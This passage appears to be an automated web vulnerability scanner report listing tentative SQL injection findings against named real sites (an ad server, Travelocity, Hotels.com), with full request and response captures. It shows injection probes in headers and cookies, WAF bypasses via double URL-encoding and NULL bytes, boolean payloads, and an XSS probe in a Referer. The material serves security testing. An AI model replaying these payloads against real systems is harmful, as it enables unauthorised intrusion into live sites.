The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.10. http://adserver.adtech.de/addyn|3.0|999|3106006|0|168|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|999|3106006|0|168|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19466

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_3106006(i) {
var sVersion_3106006 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2131

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...

1.11. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176 [NGUserID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The NGUserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NGUserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00'; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 1

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:33 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.26:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:33 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 5531
Content-Type: text/html

<META HTTP-EQUIV="Content-type" CONTENT="text/html;charset=ISO-8859-1">
<!-- Sniffer Code for Flash version=100 -->
<SCRIPT LANGUAGE=JavaScript>
<!--
var swf_click = "http://dm.travelocity.com/event.n
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00''; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 2

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:34 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:34 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 794
Content-Type: text/html

<a target="_new" href="/event.ng/Type=click&FlightID=57279&AdID=88855&TargetID=8870&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,22308,22422,22783,22972,22974,23055
...[SNIP]...

1.12. http://www.hotels.com/compare/hotel_dockingbar.html [SSPV cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSPV cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the SSPV cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:30 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.13. http://www.hotels.com/compare/hotel_dockingbar.html [SSRT cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSRT cookie appears to be vulnerable to SQL injection attacks. The payloads 17075075'%20or%201%3d1--%20 and 17075075'%20or%201%3d2--%20 were each submitted in the SSRT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d1--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
